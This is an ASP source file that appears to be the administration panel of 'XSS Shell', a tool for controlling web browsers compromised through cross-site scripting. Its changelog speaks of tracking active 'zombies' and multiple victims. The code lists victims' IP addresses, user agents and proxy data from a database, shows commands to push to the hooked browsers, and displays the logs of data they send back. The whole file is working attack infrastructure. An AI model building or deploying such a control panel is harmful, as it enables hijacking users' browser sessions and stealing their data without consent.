<% '09/08/2006 ' - Started ' ' 15/08/2006 ' - Working alpha ' '18/08/2006 ' New UI ' '31/10/2006 ' Now supports activity and shows active zombies and drops non-active ones ' Multiple victim support with send and save ' Faster victim notification '01.04.2007 ' - Logs replaced AttackID for XSS Tunnel compatibility ' TODO; ' - Log commands locally for analyze later ' + Build up connection interface ' - Command Shell ' / Command Interface ' + Implement AJAX for interface (low pr) %> <% protected() Dim CallType CallType = fm_Qnstr("c") 'Call only logs Select Case CallType Case 1 Call Logs() Case 2 Call Victims(False) Case 3 ' XSS Tunnel Call Victims(True) End Select '// Poor man's AJAX Calls If CallType > 0 Then Response.End Title = "XSS Shell Admin" %> <% Call ShowCommands() %>

<%Victims(False)%>

Logs

<% Call Viewer() '--------------------------------------------------------------------------- ' Helpers '--------------------------------------------------------------------------- Sub Victims(ByVal XSSTunnel) Dim RsVic getRs RsVic, "SELECT TOP " & MAX_VICTIM & " Victim.IP, Victim.ID, Victim.VictimID, RequestTime, RawUserAgent, Data FROM Victim, VictimDetail WHERE VictimDetail.VictimID = Victim.VictimID AND lastseen > DATEADD(""s"",-" & Activity & ",Now) ORDER BY Victim.ID DESC" If XSSTunnel Then If Not RsVic.EOF And Not RsVic.BOF Then Response.Write fm_Encode(RsVic("VictimId")) Else Response.Write NO_RECORD End IF Response.End End If Response.Write "

Victims

" Dim viclist, Starter While Not RsVic.EOF PrintVictim(RsVic) If Starter Then viclist = viclist & "," viclist = viclist & fm_Encode(RsVic("VictimID")) Starter = True RsVic.MoveNext Wend Response.Write "[" & viclist fmKill RsVic End Sub Sub PrintVictim(ByVal Rs) Dim Data, ProxyData ProxyData = Rs("Data") If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "
") Data = Data & "Victim ID : " & fm_Encode(Rs("VictimID")) & "
" Data = Data & "

" & fm_Encode(Rs("RawUserAgent")) & "

" If ProxyData <> "" Then Data = Data & "

" & ProxyData & "

" Dim Checked Checked = false With Response .Write "

" .Write " " .Write Rs("IP") & " / " & fm_Encode(Rs("VictimID")) & "

" End With 'Response.Write "

" & Rs("IP") & "

" & Rs("RequestTime") & "

" End Sub ' COMMANDS BOX '--------------------------------------------------------------------------- ' Show Available Commands Sub ShowCommands() %>

Commands

<% Dim i For i = 0 To UBound(Commands) Step 3 Response.Write "

" & fm_Encode(Commands(i)) & "
" & Commands(i+2) & "

" Next %>

Parameters :

<% End Sub ' VIEWER BOX '--------------------------------------------------------------------------- ' Offline Content Viewer iframe Sub Viewer() %>

Viewer

<% End Sub ' LOGS BOX '--------------------------------------------------------------------------- ' Show recent logs from victims Sub Logs() Dim RsLog getRs RsLog, "SELECT TOP " & DEFAULT_REC & " ID, Data, Type, AttackID, Shown FROM Log ORDER BY ID DESC" ' Response.Write "

Logs : " & Minute(Now) & ":" & Second(Now) & "

" Response.Write "

" While Not RsLog.EOF PrintLog(RsLog) RsLog.MoveNext Wend Response.Write "" fmKill RsLog End Sub ' Print and Format Logs Function PrintLog(ByVal Rs) Dim Value If Rs("Data") <> "" Then Value = fm_Encode(Rs("Data")) Value = Replace(Value, "%7Bn%7D", "
") Value = Replace(Value, "%3Atrue", "%3Atrue") Else Value = Rs("AttackID") & "..." End If Dim CSSname '// Pushed If Rs("Shown") = 1 Then CSSname = "pushed" End If If Rs("Data") <> "" Then CSSname = "done" End If Value = "" & Value & "" If Rs("Type") = HTMLPAGE Then Value = "HTML - " & Rs("AttackID") End If Response.Write "

" & Value & "

" End Function %>